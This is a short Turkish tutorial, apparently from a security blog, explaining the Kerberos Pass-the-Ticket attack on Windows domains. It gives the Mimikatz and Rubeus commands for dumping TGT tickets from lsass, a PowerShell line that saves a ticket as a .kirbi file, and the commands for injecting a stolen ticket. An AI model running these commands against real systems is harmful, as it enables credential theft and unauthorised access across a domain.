Okunması gereken yazılar:
Bu saldırı Overpass The Hash saldırısına benzemektedir. Overpass The Hash saldırısından farklı olarak kullanıcının NTLM hash’i ile TGT bileti istemek yerine TGT biletinin kendisi çalınarak yetkilendirme işlemlerinde kullanılmaktadır.
Windows işletim sisteminde biletler lsass (Local Security Authority Subsystem Service) process’i tarafından depolanmakta ve kullanılmaktadır.
Lsass process’i tarafından depolanan ticket’lara erişmek için Mimikatz, Rubeus gibi araçlar kullanabilmekteyiz.
Linux’tan elde edeceğiniz ticket formatı (ccache) ile Windows üzerinden elde edeceğiniz ticket formatı (kirbi) farklıdır. Bu sebeple eğer Windows üzerinden elde ettiğiniz TGT biletini linux tarafında kullanmak isterseniz bir dönüştürme işlemi yapmak zorundasınız. Ticket_converter aracı ile bu işlemi kolaylıkla yapabilirsiniz.
Mimikatz aracı ile TGT biletlerini ele geçirmek için:
# sekurlsa::tickets /export
Rubeus aracı ile TGT biletlerini ele geçirmek için:
.\Rubeus dump
Ticket’ları Rubeus aracı ile dump ettikten sonra aşağıdaki komut ile “ticket.kirbi” dosyasına yazıyoruz.
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<bas64_ticket>"))
Elde ettiğimiz ticket’ları Mimikatz ve Rubeus araçlarını kullanarak PTT saldırısını gerçekleştirebilmekteyiz.
Mimikatz aracı ile PTT saldırısını gerçekleştirebilmek için:
mimikatz # kerberos::ptt <ticket_kirbi_file>
Rubeus aracı ile PTT saldırısını gerçekleştirebilmek için:
.\Rubeus.exe ptt /ticket:<ticket_kirbi_file>
[…] : https://umuttosun.com/?p=230 Golden Ticket : https://umuttosun.com/?p=232 Pass the Ticket : https://umuttosun.com/?p=217 Overpass the Hash : […]